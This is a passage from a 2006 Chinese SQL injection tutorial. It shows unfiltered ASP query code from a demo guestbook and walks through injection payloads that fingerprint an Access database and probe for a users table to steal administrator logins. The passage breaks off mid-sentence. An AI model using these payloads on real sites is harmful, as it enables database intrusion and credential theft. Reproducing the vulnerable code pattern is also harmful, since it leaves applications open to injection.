四大数据库注入教程.pdf

Sql 注入攻击技术初探 整理:Blackhumor Site: 2006.6.19 完稿 简介：sql 注入一般针对基于web 平台的应用程序 由于很多时候程序员在编写程序的时 候没有对浏览器端提交的参数进行合法的判断，可以由用户自己修改构造参数（也可以 是 sql 查询语句），并传递至服务器端 获取想要的敏感信息甚至执行危险代码和系统命 令 就形成了sql 注入漏洞, 时至今日任然有很大一部分网站存在sql 注入漏洞，可想而知 sql 注入攻击的危害，下面就目前sql 注入攻击技术进行总结，让我们更加了解这种攻击 与防御方法 一、 access 数据库注入攻击技术 目前国内很大一部分网站都是采用asp+access 搭建成的 本文演示网站是在虚拟机搭建的一套留言板程序 28:8181/bbs/index.asp （留言板首页） 点击公告连接 此时注意观察地址栏28:8181/bbs/gshow.asp?id=1 Gshow.asp 后面跟了一个 id 参数，其值为数字 1， 下面我们来看一下服务器端的 gshow.asp 中的读取公告内容的代码 % set rs=server.CreateObject(adodb.recordset) sql=select * from gonggao where id=request.QueryString(id) rs.open sql,conn,1,3 if rs.eof or rs.bof then response.write(暂无公告内容) else % div align=center%=rs(titles)%br/ %=rs(content)%%=rs(addtime)%/div % end if rs.close set rs=nothing % 可以很明显的看到程序在接收到浏览器端传递过来的id 参数时，没有经过 任何过滤就直接进入数据接查询了，那么我们怎么来通过这个漏洞来获取我们想要的信 息呢，测试之前我们是不知道对方所使用的数据库类型 也不知道数据库里面有哪些表、 字段等等（类似black box test ），一般情况下asp 可以与access 和 mssql 数据库结合， 首先我们来判断一下数据库类型 在id 参数后面加上 and exists(select * from msysobjects) 注:mysysobjects 是access 的系统表 完整的测试语句: 28:8181/bbs/gshow.asp?id=1 and exists(select * from msysobjects) 回车提交到服务器端 如图，根据服务器返回结果，(Microsoft JET Database Engine 错误 80040e09不能读取 记录；在msysobjects 上没有读取数据权限。/bbs/gshow.asp ，行 11) 说明存在msysobjects 表，也就是说后台是采用的 access 数据库(若服务器返回[Microsoft][ODBC SQL Server Driver][SQL Server]对象名 msysobjects 无效。则说明是sqlserver 数据库,相关方法会在下面 讲述，这里重点讨论access 数据库) 下面我们来进一步获取我们想要的信息 一般网站重要的信息就是后台管理员登陆帐号 密码了，我们提交28:8181/bbs/gshow.asp?id=1 and exists(select * from users) （判断